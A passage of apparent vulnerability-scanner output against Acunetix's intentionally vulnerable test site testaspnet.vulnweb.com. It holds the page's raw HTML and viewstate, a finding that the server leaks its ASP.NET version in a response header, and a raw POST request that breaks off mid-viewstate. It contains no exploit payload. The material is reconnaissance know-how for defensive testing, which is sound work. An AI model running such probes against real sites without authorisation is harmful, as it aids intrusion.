WF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (456 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10985 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (10985 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgI